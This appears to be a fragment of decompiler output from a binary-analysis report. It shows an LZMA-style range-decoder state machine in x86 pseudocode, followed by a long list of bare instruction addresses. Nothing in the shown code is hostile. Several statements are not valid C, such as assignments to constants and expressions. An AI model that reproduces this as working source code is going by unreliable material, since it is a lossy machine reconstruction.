											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00000000
                                                    0x00406f16
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00407004
                                                    0x00407004
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00407042
                                                    0x00407046
                                                    0x004070a6
                                                    0x004070a9
                                                    0x004070ae
                                                    0x004070af
                                                    0x004070b1
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x0040675e
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d7
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x00000000
                                                    0x004070c9
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406f9b
                                                    0x0040714a
                                                    0x00000000
                                                    0x0040714a
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00000000
                                                    0x00406967
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00406943
                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9b
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406ba8
                                                    0x00406bab
                                                    0x00406bae
                                                    0x00406bb1
                                                    0x00406bb4
                                                    0x00406bb6
                                                    0x00406bbd
                                                    0x00406bbe
                                                    0x00406bc0
                                                    0x00406bc3
                                                    0x00406bc6
                                                    0x00406bc9
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406bce
                                                    0x00406b7f
                                                    0x00406b82
                                                    0x00406b85
                                                    0x00406b8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c0a
                                                    0x00406c0d
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406be9
                                                    0x00406bec
                                                    0x00406bef
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406c02
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c3a
                                                    0x00406c3c
                                                    0x00406c40
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca2
                                                    0x00406ca5
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00000000
                                                    0x00406cb2
                                                    0x00406c9d
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00406cd8
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00406ce1
                                                    0x00406ce1
                                                    0x00406ce4
                                                    0x00406ceb
                                                    0x00406cf0
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afd
